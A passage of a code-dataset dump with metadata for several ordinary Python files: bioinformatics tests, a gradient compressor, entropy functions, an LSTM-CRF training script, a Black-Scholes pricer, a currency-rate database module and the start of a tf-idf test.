"attribute"}, {"api_name": "stores.models.Store", "line_number": 165, "usage_type": "name"}, {"api_name": "stores.serializers.StoreSerializer", "line_number": 166, "usage_type": "call"}, {"api_name": "reviews.models.Hashtag.objects.get", "line_number": 167, "usage_type": "call"}, {"api_name": "reviews.models.Hashtag.objects", "line_number": 167, "usage_type": "attribute"}, {"api_name": "reviews.models.Hashtag", "line_number": 167, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 173, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 174, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_401_UNAUTHORIZED", "line_number": 174, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 174, "usage_type": "name"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 131, "usage_type": "call"}, {"api_name": "models.Bookmark.objects.all", "line_number": 184, "usage_type": "call"}, {"api_name": "models.Bookmark.objects", "line_number": 184, "usage_type": "attribute"}, {"api_name": "models.Bookmark", "line_number": 184, "usage_type": "name"}, {"api_name": "stores.models", "line_number": 186, "usage_type": "name"}, {"api_name": "stores.models.append", 
"line_number": 191, "usage_type": "call"}, {"api_name": "stores.models", "line_number": 191, "usage_type": "name"}, {"api_name": "mlxtend.preprocessing.TransactionEncoder", "line_number": 194, "usage_type": "call"}, {"api_name": "stores.models", "line_number": 195, "usage_type": "argument"}, {"api_name": "pandas.DataFrame", "line_number": 196, "usage_type": "call"}, {"api_name": "mlxtend.frequent_patterns.apriori", "line_number": 199, "usage_type": "call"}, {"api_name": "mlxtend.frequent_patterns.association_rules", "line_number": 207, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 221, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 226, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 182, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 269, "usage_type": "call"}, {"api_name": "stores.models.split", "line_number": 272, "usage_type": "call"}, {"api_name": "stores.models", "line_number": 272, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 295, "usage_type": "call"}, {"api_name": "stores.models.Store", "line_number": 295, "usage_type": "argument"}, {"api_name": "stores.serializers.StoreSerializer", "line_number": 298, "usage_type": "call"}, {"api_name": "stores.models.Store.objects.order_by", "line_number": 301, "usage_type": "call"}, {"api_name": "stores.models.Store.objects", "line_number": 301, "usage_type": "attribute"}, {"api_name": "stores.models.Store", "line_number": 301, "usage_type": "name"}, {"api_name": "stores.serializers.StoreSerializer", "line_number": 303, "usage_type": "call"}, {"api_name": "stores.models.Store.objects.order_by", "line_number": 306, "usage_type": "call"}, {"api_name": "stores.models.Store.objects", "line_number": 306, "usage_type": "attribute"}, {"api_name": "stores.models.Store", "line_number": 306, "usage_type": "name"}, {"api_name": "stores.serializers.StoreSerializer", "line_number": 308, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 311, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 255, "usage_type": "call"}]} +{"seq_id": "24088036777", "text": "#!/usr/bin/python\n\nimport unittest\nimport tempfile\nimport os\nfrom glob import glob\nimport vxdetector.interact_bowtie2 as ibo\nimport shutil\n\n\nclass test_mapbowtie2(unittest.TestCase):\n def setUp(self):\n self.path = f'{os.path.dirname(__file__)}/'\n ibo.buildbowtie2(f'{self.path}test_data/')\n self.fasta_file = (f'{self.path}test_data/'\n '5011_S225_L001_R1_001.fastq.gz')\n self.read2_file = (f'{self.path}test_data/'\n '5011_S225_L001_R2_001.fastq.gz')\n self.test_unpaired = f'{self.path}test_data/unpaired/unpaired.sam'\n self.test_paired = f'{self.path}test_data/paired/paired.bed'\n self.fp_tmpdir = tempfile.mkdtemp()\n\n def tearDown(self):\n file_list = glob(f'{self.path}test_data/Indexed_bt2/*.bt2')\n for file in file_list:\n os.remove(file)\n shutil.rmtree(self.fp_tmpdir)\n\n def test_aligned_path(self):\n path = f'{os.path.dirname(__file__)}/test_data/'\n paired = False\n temp_path = self.fp_tmpdir\n aligned_path, Error = ibo.mapbowtie2(self.fasta_file, self.read2_file,\n path, temp_path, paired)\n self.assertEqual(aligned_path, f'{temp_path}unpaired.bam')\n self.assertEqual(Error, False)\n paired = True\n aligned_path, Error = ibo.mapbowtie2(self.fasta_file, self.read2_file,\n path, temp_path, paired)\n self.assertEqual(aligned_path, 
f'{temp_path}paired.bed')\n self.assertEqual(Error, False)\n\n def test_pipe(self):\n samtools_path = shutil.which('samtools')\n if samtools_path is None:\n samtools_path = '$CONDA/bin/samtools'\n path = f'{os.path.dirname(__file__)}/test_data/'\n paired = False\n temp_path = self.fp_tmpdir\n content = []\n with open(self.test_unpaired)as f:\n for line in f:\n content.append(line.strip().split())\n ibo.mapbowtie2(self.fasta_file, self.read2_file,\n path, temp_path, paired)\n os.system(f'{samtools_path} view {temp_path}unpaired.bam '\n f'> {temp_path}unpaired.sam')\n output = []\n with open(f'{temp_path}unpaired.sam') as f:\n for line in f:\n output.append(line.strip().split())\n self.assertEqual(output, content)\n paired = True\n content = []\n with open(self.test_paired)as f:\n for line in f:\n content.append(line.strip().split())\n ibo.mapbowtie2(self.fasta_file, self.read2_file,\n path, temp_path, paired)\n output = []\n with open(f'{temp_path}paired.bed')as f:\n for line in f:\n output.append(line.strip().split())\n self.assertEqual(output, content)\n\n def test_wrong_file_type(self):\n path = f'{os.path.dirname(__file__)}/test_data/'\n read2_file = f'{path}test_data/paired/BED.bed'\n paired = True\n aligned_path, Error = ibo.mapbowtie2(self.fasta_file, read2_file,\n path, self.fp_tmpdir, paired)\n self.assertEqual(Error, True)\n paired = False\n fasta_file_local = f'{path}test_data/paired/BED.bed'\n aligned_path, Error = ibo.mapbowtie2(fasta_file_local, read2_file,\n path, self.fp_tmpdir, paired)\n self.assertEqual(Error, True)\n\n def test_no_index(self):\n no_index_path = f'{self.fp_tmpdir}/'\n with self.assertRaises(FileNotFoundError) as cm:\n ibo.mapbowtie2(self.fasta_file, self.read2_file, no_index_path,\n self.fp_tmpdir, False)\n self.assertEqual(f'No Index files found under \"{no_index_path}'\n 'Indexed_bt2/bowtie2\"', str(cm.exception))\n\n\nclass test_buildbowtie2(unittest.TestCase):\n def tearDown(self):\n path = f'{os.path.dirname(__file__)}/'\n file_list = glob(f'{path}test_data/Indexed_bt2/*.bt2')\n for file in file_list:\n os.remove(file)\n\n def test_index(self):\n path = f'{os.path.dirname(__file__)}/'\n ibo.buildbowtie2(f'{path}test_data/')\n self.assertEqual(os.path.exists(f'{path}test_data/Indexed_bt2'\n '/bowtie2.1.bt2'), True)\n", "repo_name": "jlab/algorithm_vxdetector", "sub_path": "vxdetector/tests/test_interact_bowtie.py", "file_name": "test_interact_bowtie.py", "file_ext": "py", "file_size_in_byte": 4403, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "unittest.TestCase", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "vxdetector.interact_bowtie2.buildbowtie2", "line_number": 14, "usage_type": "call"}, {"api_name": "vxdetector.interact_bowtie2", "line_number": 14, "usage_type": "name"}, {"api_name": "tempfile.mkdtemp", "line_number": 21, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 24, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 26, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "vxdetector.interact_bowtie2.mapbowtie2", "line_number": 33, "usage_type": "call"}, {"api_name": 
"vxdetector.interact_bowtie2", "line_number": 33, "usage_type": "name"}, {"api_name": "vxdetector.interact_bowtie2.mapbowtie2", "line_number": 38, "usage_type": "call"}, {"api_name": "vxdetector.interact_bowtie2", "line_number": 38, "usage_type": "name"}, {"api_name": "shutil.which", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path", "line_number": 47, "usage_type": "attribute"}, {"api_name": "vxdetector.interact_bowtie2.mapbowtie2", "line_number": 54, "usage_type": "call"}, {"api_name": "vxdetector.interact_bowtie2", "line_number": 54, "usage_type": "name"}, {"api_name": "os.system", "line_number": 56, "usage_type": "call"}, {"api_name": "vxdetector.interact_bowtie2.mapbowtie2", "line_number": 68, "usage_type": "call"}, {"api_name": "vxdetector.interact_bowtie2", "line_number": 68, "usage_type": "name"}, {"api_name": "os.path.dirname", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path", "line_number": 77, "usage_type": "attribute"}, {"api_name": "vxdetector.interact_bowtie2.mapbowtie2", "line_number": 80, "usage_type": "call"}, {"api_name": "vxdetector.interact_bowtie2", "line_number": 80, "usage_type": "name"}, {"api_name": "vxdetector.interact_bowtie2.mapbowtie2", "line_number": 85, "usage_type": "call"}, {"api_name": "vxdetector.interact_bowtie2", "line_number": 85, "usage_type": "name"}, {"api_name": "vxdetector.interact_bowtie2.mapbowtie2", "line_number": 92, "usage_type": "call"}, {"api_name": "vxdetector.interact_bowtie2", "line_number": 92, "usage_type": "name"}, {"api_name": "unittest.TestCase", "line_number": 98, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 100, "usage_type": "call"}, {"api_name": "os.path", "line_number": 100, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 101, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 103, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path", "line_number": 106, "usage_type": "attribute"}, {"api_name": "vxdetector.interact_bowtie2.buildbowtie2", "line_number": 107, "usage_type": "call"}, {"api_name": "vxdetector.interact_bowtie2", "line_number": 107, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 108, "usage_type": "call"}, {"api_name": "os.path", "line_number": 108, "usage_type": "attribute"}]} +{"seq_id": "5923755115", "text": "import torch\nfrom copy import deepcopy as dcopy\nimport math\nimport collections\n\n\nclass topkCompressor:\n def __init__(self, compress_rate: float = 0.5, device=torch.device(\"cpu\")):\n self.compress_rate = compress_rate\n self.device = device\n\n def set_compress_rate(self, compress_rate):\n self.compress_rate = compress_rate\n\n def compress(self, gradient_dict: dict, compress: bool = True):\n if gradient_dict['compressed']:\n return gradient_dict\n\n # gradient_tmp = dcopy(gradient_dict['gradient'])\n\n new_gradient = {}\n for k in gradient_dict.keys():\n if k == \"gradient\":\n new_gradient[\"gradient\"] = collections.OrderedDict({k: None for k in gradient_dict['gradient'].keys()})\n else:\n new_gradient[k] = gradient_dict[k]\n\n for k in gradient_dict['gradient'].keys():\n tensor = gradient_dict['gradient'][k].to(self.device)\n\n shape = list(tensor.size())\n tensor = tensor.flatten()\n numel = tensor.numel()\n tensor_calculate = tensor\n\n tensor_calculate = tensor_calculate.abs()\n tensor_calculate_filtered = tensor_calculate[tensor_calculate > 
0]\n\n if len(tensor_calculate) == 0 or self.compress_rate == 1.0:\n compress = False\n\n if compress:\n cr = max(0.0, min(1.0, self.compress_rate))\n thr = find_threshold_by_sort(tensor_calculate_filtered, cr)\n # thr = find_threshold_by_approach(tensor_calculate_filtered, cr)\n\n mask = tensor_calculate.to(self.device) >= thr\n else:\n mask = tensor.abs().to(self.device) > 0\n\n indices, = torch.where(mask)\n values = tensor[indices]\n\n tensor_compressed = values.cpu().tolist()\n ctx = shape, mask.cpu().tolist(), numel\n new_gradient['gradient'][k] = (tensor_compressed, ctx)\n new_gradient['compressed'] = True\n return new_gradient\n\n def gf_compress(self, gradient_dict: dict, global_gradient_dict, fusion_ratio=0.5, compress: bool = True):\n if gradient_dict['compressed']:\n return gradient_dict\n\n if global_gradient_dict is None:\n return self.compress(gradient_dict=gradient_dict,\n compress=True)\n\n new_gradient = {}\n for k in gradient_dict.keys():\n if k == \"gradient\":\n new_gradient[\"gradient\"] = collections.OrderedDict({k: None for k in gradient_dict['gradient'].keys()})\n else:\n new_gradient[k] = gradient_dict[k]\n\n for k in gradient_dict['gradient'].keys():\n tensor = gradient_dict['gradient'][k].to(self.device)\n gf_tensor = global_gradient_dict['gradient'][k].to(self.device)\n\n shape = list(tensor.size())\n tensor = tensor.flatten()\n numel = tensor.numel()\n tensor_calculate = tensor\n\n gf_tensor = gf_tensor.flatten()\n gf_tensor_calculate = gf_tensor\n\n mix_tensor_calculate = torch.add(normalize(tensor_calculate.abs()),\n normalize(gf_tensor_calculate.abs()).mul(fusion_ratio/(1-fusion_ratio)))\n\n mix_tensor_calculate_filtered = mix_tensor_calculate[mix_tensor_calculate > 0]\n\n if len(tensor_calculate) == 0 or self.compress_rate == 1.0:\n compress = False\n\n if compress:\n cr = max(0.0, min(1.0, self.compress_rate))\n thr = find_threshold_by_sort(mix_tensor_calculate_filtered, cr)\n # thr = find_threshold_by_approach(tensor_calculate_filtered, cr)\n\n mask = mix_tensor_calculate.to(self.device) >= thr\n else:\n mask = tensor.abs().to(self.device) > 0\n\n indices, = torch.where(mask)\n values = tensor[indices]\n\n tensor_compressed = values.cpu().tolist()\n ctx = shape, mask.cpu().tolist(), numel\n new_gradient['gradient'][k] = (tensor_compressed, ctx)\n new_gradient['compressed'] = True\n return new_gradient\n\n def decompress(self, gradient_dict: dict):\n if not gradient_dict['compressed']:\n return gradient_dict\n\n new_gradient = {}\n for k in gradient_dict.keys():\n if k == \"gradient\":\n new_gradient[\"gradient\"] = collections.OrderedDict({k: None for k in gradient_dict['gradient'].keys()})\n else:\n new_gradient[k] = gradient_dict[k]\n\n for k in gradient_dict['gradient'].keys():\n # print(time.time())\n j = gradient_dict['gradient'][k]\n new_mem, ctx = j\n shape, mask, numel = ctx\n\n values = torch.tensor(new_mem).to(self.device)\n indices = torch.tensor([i for i in range(len(mask)) if mask[i]]).type(torch.long).to(self.device)\n mask = torch.tensor(mask)\n\n tensor_decompressed = torch.zeros(numel, dtype=values.dtype, layout=values.layout, device=values.device)\n tensor_decompressed.scatter_(0, indices, values)\n new_gradient['gradient'][k] = tensor_decompressed.view(shape)\n new_gradient['compressed'] = False\n return new_gradient\n\n\ndef find_threshold_buildin_function(tensor, compress_rate=1.0):\n thr = torch.min(\n torch.topk(tensor.abs(), max(1, int(tensor.numel() * compress_rate)), largest=True, sorted=False)[0])\n return thr\n\n\ndef 
find_threshold_by_sort(tensor, cr):\n numel = tensor.numel()\n idx = max(0, min(numel, round(numel * float(cr))))\n values, _ = torch.sort(tensor)\n values = torch.fliplr(values.unsqueeze(0)).squeeze(0)\n return values[idx]\n\n\ndef find_threshold_by_approach(tensor, compress_rate=1.0, max_iter=10, device=torch.device(\"cpu\")):\n tmin = torch.min(tensor)\n tmax = torch.max(tensor)\n threshold = 0.0\n for _ in range(max_iter):\n threshold = (tmax + tmin) / 2.0\n mask = tensor.abs().to(device) >= threshold\n selected = mask.sum()\n # +- 5% is ok\n if selected > (tensor.numel() * min(compress_rate + 0.05, 1)):\n tmin = threshold\n continue\n if selected < (tensor.numel() * max(compress_rate - 0.05, 0.01)):\n tmax = threshold\n continue\n break\n return threshold\n\n\ndef normalize(value):\n value /= torch.norm(value)\n return value\n", "repo_name": "tony92151/global-momentum-fusion-fl", "sub_path": "sparse_optimizer/topk_compressor.py", "file_name": "topk_compressor.py", "file_ext": "py", "file_size_in_byte": 6517, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.device", "line_number": 8, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.where", "line_number": 51, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 71, "usage_type": "call"}, {"api_name": "torch.add", "line_number": 87, "usage_type": "call"}, {"api_name": "torch.where", "line_number": 104, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 120, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 130, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 131, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 131, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 132, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 134, "usage_type": "call"}, {"api_name": "torch.min", "line_number": 142, "usage_type": "call"}, {"api_name": "torch.topk", "line_number": 143, "usage_type": "call"}, {"api_name": "torch.sort", "line_number": 150, "usage_type": "call"}, {"api_name": "torch.fliplr", "line_number": 151, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 155, "usage_type": "call"}, {"api_name": "torch.min", "line_number": 156, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 157, "usage_type": "call"}, {"api_name": "torch.norm", "line_number": 175, "usage_type": "call"}]} +{"seq_id": "3492519750", "text": "\"\"\"Entropy related functions.\"\"\"\n\nfrom collections import Counter\nfrom collections.abc import Sequence\nimport math\nfrom typing import TypeVar\n\nT = TypeVar(\"T\")\n\n\ndef shannon_entropy(ciphertext: Sequence[T], base: int = 2) -> float:\n \"\"\"Shannon entropy. by default in bits.\"\"\"\n f = Counter(ciphertext)\n N = len(ciphertext)\n H: float = 0.0\n for v in f.values():\n H = H - v / N * math.log(v / N, base)\n print(f\"Shannon Entropy = {H:.3f} bits (size={N})\")\n return H\n\n\ndef shannon2_entropy(ciphertext: Sequence[T], base: int = 2, cut: int = 0) -> float:\n \"\"\"Shannon entropy. 
by default in bits.\"\"\"\n N = len(ciphertext)\n if N < 3:\n return 0.0\n l: list[tuple[T, ...]] = []\n if cut == 0:\n for i in range(0, N - 1):\n l.append((ciphertext[i], ciphertext[i + 1]))\n elif cut in (1, 2):\n for i in range(cut - 1, N - 1, 2):\n l.append((ciphertext[i], ciphertext[i + 1]))\n else:\n raise Exception\n f = Counter(l)\n H: float = 0.0\n for v in f.values():\n H = H - v / N * math.log(v / N, base)\n print(f\"S = {H:.3f} bits (size={N})\")\n return H\n", "repo_name": "micheloosterhof/aldegonde", "sub_path": "src/aldegonde/stats/entropy.py", "file_name": "entropy.py", "file_ext": "py", "file_size_in_byte": 1143, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.TypeVar", "line_number": 8, "usage_type": "call"}, {"api_name": "collections.abc.Sequence", "line_number": 11, "usage_type": "name"}, {"api_name": "collections.Counter", "line_number": 13, "usage_type": "call"}, {"api_name": "math.log", "line_number": 17, "usage_type": "call"}, {"api_name": "collections.abc.Sequence", "line_number": 22, "usage_type": "name"}, {"api_name": "collections.Counter", "line_number": 36, "usage_type": "call"}, {"api_name": "math.log", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "10424604107", "text": "#coding: utf-8\nfrom __future__ import print_function\n\n# the yaml load to dict construct\nimport yaml\nimport pickle\nfrom load_data import load_vecs, init_data\nfrom model import SequenceLabelModel\n\ndef main():\n\n yaml_path = \"local_used_lstm_crf/new_config.yml\"\n with open(yaml_path, \"r\") as f:\n config = yaml.load(f)\n\n # return in the first loop\n #return\n \n feature_names = config[\"model_params\"][\"feature_names\"]\n \n feature_weight_shape_dict, feature_weight_dropout_dict, feature_init_weight_dict = dict(), dict(), dict()\n for feature_name in feature_names:\n feature_weight_shape_dict[feature_name] = config[\"model_params\"][\"embed_params\"][feature_name][\"shape\"]\n feature_weight_dropout_dict[feature_name] = config[\"model_params\"][\"embed_params\"][feature_name][\"dropout_rate\"]\n \n path_pre_train = config[\"model_params\"][\"embed_params\"][feature_name][\"path\"]\n #path_pre_train = \"\"\n if path_pre_train:\n with open(path_pre_train, \"rb\") as f:\n feature_init_weight_dict[feature_name] = pickle.load(f)\n \n # load vecs\n path_vocs = []\n for feature_name in feature_names:\n path_vocs.append(config[\"data_params\"][\"voc_params\"][feature_name][\"path\"])\n path_vocs.append(config[\"data_params\"][\"voc_params\"][\"label\"][\"path\"])\n vocs = load_vecs(path_vocs)\n \n # load train data\n sep_str = config[\"data_params\"][\"sep\"]\n assert sep_str in [\"table\", \"space\"]\n sep = \"\\t\" if sep_str == \"table\" else ' '\n data_dict = init_data(\n path = config[\"data_params\"][\"path_train\"],\n feature_names = feature_names,\n sep = sep,\n vocs = vocs,\n max_len= config[\"model_params\"][\"sequence_length\"],\n model = \"train\"\n )\n \n \n model = SequenceLabelModel(\n sequence_length=config[\"model_params\"][\"sequence_length\"],\n nb_classes=config[\"model_params\"][\"nb_classes\"],\n nb_hidden = config[\"model_params\"][\"bilstm_params\"][\"num_units\"],\n \n feature_weight_shape_dict = feature_weight_shape_dict,\n feature_init_weight_dict = feature_init_weight_dict,\n feature_weight_dropout_dict = feature_weight_dropout_dict,\n \n dropout_rate = config[\"model_params\"][\"dropout_rate\"],\n nb_epoch= config[\"model_params\"][\"nb_epoch\"],\n 
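One hedged note on the training script quoted in this record: its read_yaml helper calls yaml.load(f) with no Loader argument, a form that has been deprecated since PyYAML 5.1 and warns at runtime. For a plain config file of scalars and maps, the safe equivalent is the sketch below (same behaviour for this use case, assuming no custom YAML tags are involved):

import yaml

def read_yaml(yaml_path):
    with open(yaml_path, "r", encoding="utf-8") as f:
        # safe_load restricts parsing to standard YAML types and avoids
        # arbitrary Python object construction
        return yaml.safe_load(f)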
feature_names = feature_names,\n \n batch_size=config[\"model_params\"][\"batch_size\"],\n train_max_patience = config[\"model_params\"][\"max_patience\"],\n use_crf = config[\"model_params\"][\"use_crf\"],\n l2_rate=config[\"model_params\"][\"l2_rate\"],\n rnn_unit = config[\"model_params\"][\"rnn_unit\"],\n learning_rate= config[\"model_params\"][\"learning_rate\"],\n clip = config[\"model_params\"][\"clip\"],\n path_model= config[\"model_params\"][\"path_model\"]\n )\n \n model.fit(\n data_dict= data_dict, dev_size=config[\"model_params\"][\"dev_size\"]\n )\n\n\nif __name__ == \"__main__\":\n main()", "repo_name": "tingxiatian/LinuxVersionLSTM", "sub_path": "local_used_lstm_crf/train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 2987, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "yaml.load", "line_number": 14, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 30, "usage_type": "call"}, {"api_name": "load_data.load_vecs", "line_number": 37, "usage_type": "call"}, {"api_name": "load_data.init_data", "line_number": 43, "usage_type": "call"}, {"api_name": "model.SequenceLabelModel", "line_number": 53, "usage_type": "call"}, {"api_name": "model.fit", "line_number": 76, "usage_type": "call"}]} +{"seq_id": "18379595761", "text": "import pandas_datareader as pdr\nfrom pandas_datareader import data, wb\nfrom datetime import date\nimport numpy as np\nimport pandas as pd\nfrom scipy import log,exp,sqrt,stats\n\ndef blackscholes_call(S,E,T,rf,sigma):\n\t#first we have to calculate d1 and d2 parameters\n\td1=(log(S/E)+(rf+sigma*sigma/2.0)*T)/(sigma*sqrt(T))\n\td2 = d1-sigma*sqrt(T)\n\tprint(d1)\n\tprint(d2)\n\t#we need N(x) normal distribution function\n\treturn S*stats.norm.cdf(d1)-E*exp(-rf*T)*stats.norm.cdf(d2)\n\ndef blackscholes_put(S,E,T,rf,sigma):\n\t#first we have to calculate d1 and d2 parameters\n\td1=(log(S/E)+(rf+sigma*sigma/2.0)*T)/(sigma*sqrt(T))\n\td2 = d1-sigma*sqrt(T)\n\t#we need N(x) normal distribution function\n\treturn -S*stats.norm.cdf(-d1)+E*exp(-rf*T)*stats.norm.cdf(-d2)\n\t\nif __name__ == \"__main__\":\n\t\n\tS0=100 #underlying stock price at t=0\n\tE=100\t\t#strike price\n\tT = 1\t\t#expiry 1=1year=365days\n\trf = 0.05 \t#risk-free rate\n\tsigma=0.2\t#volatility of the underlying stock\n\t\n\tprint(\"Call option price according to Black-Scholes model: \",blackscholes_call(S0,E,T,rf,sigma))\n\tprint(\"Put option price according to Black-Scholes model: \",blackscholes_put(S0,E,T,rf,sigma))", "repo_name": "johnmihalik/quant-finance", "sub_path": "original/blackscholes.py", "file_name": "blackscholes.py", "file_ext": "py", "file_size_in_byte": 1140, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "scipy.log", "line_number": 10, "usage_type": "call"}, {"api_name": "scipy.sqrt", "line_number": 10, "usage_type": "call"}, {"api_name": "scipy.sqrt", "line_number": 11, "usage_type": "call"}, {"api_name": "scipy.stats.norm.cdf", "line_number": 15, "usage_type": "call"}, {"api_name": "scipy.stats.norm", "line_number": 15, "usage_type": "attribute"}, {"api_name": "scipy.stats", "line_number": 15, "usage_type": "name"}, {"api_name": "scipy.exp", "line_number": 15, "usage_type": "call"}, {"api_name": "scipy.log", "line_number": 19, "usage_type": "call"}, {"api_name": "scipy.sqrt", "line_number": 19, "usage_type": "call"}, {"api_name": "scipy.sqrt", "line_number": 20, "usage_type": 
"call"}, {"api_name": "scipy.stats.norm.cdf", "line_number": 22, "usage_type": "call"}, {"api_name": "scipy.stats.norm", "line_number": 22, "usage_type": "attribute"}, {"api_name": "scipy.stats", "line_number": 22, "usage_type": "name"}, {"api_name": "scipy.exp", "line_number": 22, "usage_type": "call"}]} +{"seq_id": "23107405346", "text": "# -*- coding: utf-8 -*-\n\nfrom datetime import datetime\nfrom time import strftime\nfrom pyodbc import connect\nfrom config import Config\nimport logger\n\nlog = logger.getLogger()\n\nclass BaseDatos(object):\n \"\"\"Clase de acceso a datos\"\"\"\n\n @classmethod\n def conecta(cls):\n \"\"\"Conecta a la base de datos de pruebas\\nRegresa un objeto con la conexión\"\"\"\n try:\n configuracion = Config.obtiene_config_basedatos()\n conn = connect('driver={%s};server=%s;database=%s;uid=%s;pwd=%s' % configuracion)\n return conn\n except BaseException as ex:\n log.error(\"Error al conectar a base de datos: %s\", ex)\n raise\n \n @classmethod\n def existe_tipo_cambio(cls, moneda, fecha):\n \"\"\"Consulta el tipo de cambio del día en la base de datos\\nRecibe la conexión a BD, la moneda y la fecha a consultar\\nRegresa el número de registros coincidentes\"\"\"\n try:\n conn = cls.conecta()\n cursor = conn.cursor()\n cadena_select = \"\"\"SELECT COUNT(TIPO_CAMBIO_MXN)\n FROM [dbo].[TipoCambioMonedas]\n WHERE CODIGO =? AND FECHA_PUBLICACION =? AND Activo = 1\"\"\"\n params = [moneda, fecha]\n cursor.execute(cadena_select, params)\n result = cursor.fetchone()\n cursor.close()\n conn.close()\n if result == None:\n return 0\n else:\n return result[0]\n except Exception as ex:\n log.error(\"Error al consultar el tipo de cambio en base de datos: %s\", ex)\n raise\n\n @classmethod\n def inserta_tipo_cambio(cls, fecha_publicacion, fecha_aplicacion, tipo_cambio, moneda):\n \"\"\"Inserta el nuevo tipo de cambio del día en la base de datos\\nRecibe la conexión a BD, la fecha, los días de vigencia, el valor del nuevo tipo de cambio y la moneda\\nRegresa el número de registros insertados\"\"\"\n try:\n conn = cls.conecta()\n cursor = conn.cursor()\n cadena_insert = \"\"\"INSERT INTO [dbo].[TipoCambioMonedas]\n (CODIGO, FECHA_PUBLICACION, FECHA_APLICACION, TIPO_CAMBIO_USD, TIPO_CAMBIO_MXN, ACTIVO)\n VALUES (?, ?, ?, ?, ?, ?)\"\"\"\n params = [moneda, fecha_publicacion, fecha_aplicacion, 1, tipo_cambio, 1]\n cursor.execute(cadena_insert, params)\n conn.commit()\n log.info(\"Se inserta el tipo de cambio: Moneda '%s', Tipo de cambio '%s' del día '%s'\", moneda, tipo_cambio, fecha_aplicacion)\n cursor.close()\n conn.close()\n return True\n except Exception as ex:\n log.error(\"Error al insertar el tipo de cambio en base de datos: %s\", ex)\n raise", "repo_name": "edgarjimenezb/DailyCurrencyRateMX", "sub_path": "datos.py", "file_name": "datos.py", "file_ext": "py", "file_size_in_byte": 2771, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logger.getLogger", "line_number": 9, "usage_type": "call"}, {"api_name": "config.Config.obtiene_config_basedatos", "line_number": 18, "usage_type": "call"}, {"api_name": "config.Config", "line_number": 18, "usage_type": "name"}, {"api_name": "pyodbc.connect", "line_number": 19, "usage_type": "call"}]} +{"seq_id": "14832037209", "text": "#! 
-*- coding: utf-8 -*-\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\nfrom __future__ import division\nfrom scipy.sparse import csr_matrix\nfrom DocumentFeatureSelection.common import data_converter\nfrom DocumentFeatureSelection.common.data_converter import DataCsrMatrix\nfrom DocumentFeatureSelection.tf_idf import tf_idf\nfrom DocumentFeatureSelection.models import ScoredResultObject\nimport logging\nimport unittest\nimport numpy\nlogging.basicConfig(level=logging.DEBUG)\nlogger = logging.getLogger(__name__)\n__author__ = 'kensuke-mi'\n\n\nclass TestTfIdf(unittest.TestCase):\n def setUp(self):\n input_dict = {\n \"label_a\": [\n [\"I\", \"aa\", \"aa\", \"aa\", \"aa\", \"aa\"],\n [\"bb\", \"aa\", \"aa\", \"aa\", \"aa\", \"aa\"],\n [\"I\", \"aa\", \"hero\", \"some\", \"ok\", \"aa\"]\n ],\n \"label_b\": [\n [\"bb\", \"bb\", \"bb\"],\n [\"bb\", \"bb\", \"bb\"],\n [\"hero\", \"ok\", \"bb\"],\n [\"hero\", \"cc\", \"bb\"],\n ],\n \"label_c\": [\n [\"cc\", \"cc\", \"cc\"],\n [\"cc\", \"cc\", \"bb\"],\n [\"xx\", \"xx\", \"cc\"],\n [\"aa\", \"xx\", \"cc\"],\n ]\n }\n\n tf_matrix = numpy.array(\n [\n [2, 12, 1, 0, 1, 1, 1, 0],\n [0, 0, 8, 1, 2, 1, 0, 0],\n 